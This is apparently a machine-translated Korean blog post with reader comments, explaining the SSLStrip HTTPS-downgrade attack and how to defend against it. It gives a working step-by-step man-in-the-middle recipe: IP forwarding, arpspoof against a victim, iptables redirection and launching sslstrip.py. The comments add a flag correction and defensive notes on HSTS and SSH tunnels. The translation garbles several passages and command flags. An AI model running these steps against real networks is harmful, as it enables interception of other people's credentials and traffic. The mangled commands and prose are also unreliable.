Moxie Marlinspike는 검은 모자 2009 라는 멋진 도구 SSL스트립, 로 보내 실제로 모든 데이터가 공개적으로 전송되고있을 때 사용자가 자신이 SSL 암호화를 사용하는 웹 사이트에 있다고 믿게 만듭니다.. 또한 SSLStrip은 사이트가 작동하는 것처럼 계속 작동하더라도 암호화가 우회되는 웹 서버를 속입니다.
내가 알 수있는 한,이 방법은 여전히 잘 작동합니다. 위협은 여전히 존재하며 우리는 모두 노출되어 있습니다. 부 아하하 ... |
기본부터 시작하겠습니다. SSL이 도대체 무엇입니까?
모르는 분들을 위해 Secure Sockets Layer (SSL; 보안 소켓 계층 프로토콜) 및 후속 전송 계층 보안 (TLS, 전송 계층 보안)은 네트워크를 통해 보안 통신을 제공하는 암호화 프로토콜, 일반적으로 인터넷.
SSL은 HTTP, SMTP, NNTP와 같은 응용 프로그램 프로토콜 사이의 계층과 TCP / IP 프로토콜 제품군의 일부인 TCP 전송 프로토콜을 통해 실행됩니다. 신뢰할 수있는 연결 (예 : TCP)을 사용하는 모든 프로토콜에 보안을 제공 할 수 있지만 대부분의 경우 HTTP와 함께 사용되어 HTTPS를 형성합니다. HTTPS 웹 응용 프로그램의 World Wide Web 페이지를 보호하는 데 사용됩니다. 전자 상거래, 공개 키 인증서를 사용하여 엔드 포인트의 ID를 확인합니다.
SSLStrip… 포르노가 Let 's Use Linux로 돌아 왔나요?
의 작동 SSL스트립 간단하다, 모든 HTTPS 요청 교체 HTTP로 웹 페이지를 작성한 다음 MITM (공격«중년의 남자«) 서버와 클라이언트 사이. 아이디어는 피해자와 공격자가 HTTP를 통해 통신하는 반면 공격자와 서버는 HTTPS를 통해 서버의 인증서와 통신한다는 것입니다. 따라서 공격자는 피해자의 모든 일반 텍스트 트래픽을 볼 수 있습니다.
이 훌륭한 도구가 어떻게 작동하는지 볼 수있는 비디오가 있습니다.
SSLStrip 사용 방법
1.- IP 전달 구성
에코 1> / proc / sys / net / ipv4 / ip_forward
2.- 두 시스템간에 ARP MITM 공격 수행 :
arpspoof -i eth0 -t VICTIMA 호스트
3.- iptables로 트래픽 리디렉션 :
iptables -t nat -A PREROUTING -p tcp –목적지-포트 80 -j REDIRECT –to-ports 8080
4.- 사용 된 포트에서 SSLStrip을 시작합니다.
python sslstrip.py -w 파일
SSLStrip 공격으로부터 자신을 보호하는 방법은 무엇입니까?
이것은 가장 아름답고 끔찍합니다. 그럴 순 없어.
Moxie (그의 비디오 69 분 미만이 낭비되지 않음)이 모든 것에 대한 유일한 해결책은 모든 HTTP 연결을 암호화하는 것입니다. 즉, 페이지 나 서비스에 관계없이 모든 인스턴스에서 공통적이고 와일드 한 "HTTP"가 "HTTPS"로 대체되는 것입니다. . Moxie가 말했듯이, '안전하지 않은 프로토콜에 의존하는 보안 프로토콜이 문제입니다.".
최소한 사용자로서 무엇을 할 수 있습니까? 공격을받을 가능성을 줄입니다.? 손상된 각 페이지 앞에 "https"가 있는지 또는 Firefox 사용자가 설치하는 경우 편집증적인 방식으로 확인합니다. NoScript 모든 페이지에서 HTTPS 연결을 강제합니다. 그러나 이것은 효과를 최소화 할뿐 무효화하는 것이 아닙니다.
음 ... 바로 가기에서 당신을 보호하는 https에 관해서는 상대적입니다.
SSL 연결에 대해 mitm 공격이 어느 정도까지 성공하지 못하는지 모르겠습니다. mitm 공격은 링크 계층에서 작동하고 SSL은 전송 계층에서 작동하므로 데이터 캡처가 가능합니다.
오래 전에 로컬 네트워크에서 mitm으로 한 과정의 작업에 대한 테스트를 수행하고 있었고 SSL에서 보낸 데이터를 가져 와서 핫메일 (ssl)을 시도하면 문제없이 패스를 반환 할 수 있습니다. 공격자가 게이트웨이를 가장하고 피해자로부터 모든 정보를 수신한다고 생각해보십시오.
정보가 안전하게 이동하는지 알 수있는 유일한 방법은 ssh 터널을 사용하는 것입니다.
다소 박해를받는다고 느끼면 ssh를 사용하여 서버에 연결하고, 로컬 포트를 통해 터널링하고, 소켓을 열고, 집에서 인터넷 연결을 사용하여 다른 사람의 컴퓨터에서 탐색하는 것입니다.
그리고 그들이 말했듯이,이 공격을 피할 수있는 방법은 없습니다. 맥으로 우리의 DHCP를 보호하고 연결하는 사람을 보호하는 것입니다.
안녕하세요, 명령 4에서 "-l 8080"이 누락되었습니다.
괜찮아. 감사!
좀 더 구체적으로 말하면, 더 이상 자신을 보호 할 수없는 지점이 MitM 공격에 포착되었습니다. 변종이 있기 때문에 어렵지만이 공격으로부터 자신을 보호하는 방법에는 여러 가지가 있습니다.
편집 :
댓글 업데이트는 그만한 가치가 있습니다! 적어도 2012 년 XNUMX 월부터 크롬과 파이어 폭스 브라우저 (이 시점에서 모두 그렇다고 놀라지 않을 것입니다)가 HSTS 헤더를 사용한다는 사실을 알게되었습니다. 상기 헤더는 "연결"이 사이트에 대한 첫 번째 연결 시도 후 항상 SSL을 사용해야 함을 브라우저에 알려 취약점을 해결합니다 (이렇게하면 취약점이 최소한으로 유지됨). 또한 Chrome은 HSTS 사이트 (웹에서 가장 인기있는 사이트) 목록을 추가하여 보안을 강화합니다. 출처: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/
아주 좋아요, 정말 멋지다고 생각합니다. 아이디어는 정말 간단합니다 😀
그래서 ...
네트워크에 둘 이상의 호스트가있을 때 arpspoof를 사용할 수 있는지 아는 사람이 있습니까? 감사합니다.